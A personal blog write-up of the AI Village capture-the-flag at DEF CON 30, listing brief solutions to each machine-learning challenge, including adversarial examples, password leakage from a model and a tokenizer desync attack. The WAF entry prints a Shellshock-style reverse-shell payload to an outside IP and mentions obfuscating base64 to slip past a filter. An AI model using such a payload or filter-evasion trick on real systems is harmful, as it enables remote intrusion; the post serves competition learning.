Alejandro Mosquera López is an online safety expert and Kaggle Grandmaster working in cybersecurity. His main research interests are Trustworthy AI and NLP. ORCID iD icon https://orcid.org/0000-0002-6020-3569

Tuesday, September 27, 2022

AI Village Capture the Flag @ DEFCON write up

 In August 2022 I had the chance to participate in an AI-themed CTF collocated with the DEF CON 30 security (hacking) conference. This was particularly interesting since it was presented in a novel format as a Kaggle competition where the leaderboard was ranked based on the points that each of the discovered flags was providing. Despite entering the competition in its latest stage I did manage to solve all the challenges but two, therefore achieving the second best score (although my final ranking was lower due to submission times being used as tie-breakers). No one was able to find the last flag corresponding to the Crop-2 challenge until after the CTF ended.

Overall, this was quite different from previous adversarial ML competitions and aligned more with the type of ML-related challenges seen in traditional CTFs. My solutions in order to achieve the flags were as follows:

  • Hotdog: Submitted a picture of a hotdog.
  • Math_1-4: Brute forced by guessing the upper and lower bounds of the expected solutions.
  • Honor Student: Solved via hill-climbing by incrementally adding noise.
  • Wifi: Obtained the flag by using argmin(embeddings) as character indexes.
  • Bad to Good: Found that negative demerits were not properly handled and that did the trick.
  • Baseball: Solved via hill-climbing after guessing the distribution for that player through grid search.
  • Inference: The hint in the challenge description gave it away. Since I knew the number of characters just had to try difference combinations until D3FC0N showed up as accepted.
  • Leakage: Passed the username as input to the LSTM which returned the password.
  • Forensics: The flag was in the model itself which could be accessed via model.summary().
  • Token: This was a tokenizer desync attack. Replacing BLANK was the solution.
  • Deepfake: Submitted random videos from YouTube until found one that was accepted as valid.
  • Murderbots: Identified power and temperature values via anomaly detection (deviations from the mean) that were likely human related. That gave me 9 indexes and just had to guess the last one manually.
  • Hotterdog/Theft/Salt: Generated adversarial examples with the provided models using FGS.
  • Crop_1: Generated the solution image via hill-climbing:


  • WAF: The hints led me to a well known exploit used by Crypto mining campaigns. Then it was all trial and error to figure out which portions were deemed as malicious. The final step involved obfuscating the b64 with spaces.
    • () { :;}; /bin/bash -c "bash -i >& /dev/tcp/27.1.1.1/9000 0<&1
  • Secret Sloth: Could not solve this one, although I was pretty close and located the exact place where the flag was and decoded some of the letters. It could have been solved via brute force as some participants shared later :(


  • Crop_2: Ran out of time so I could not even attempt to solve this one.



Posted by on
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)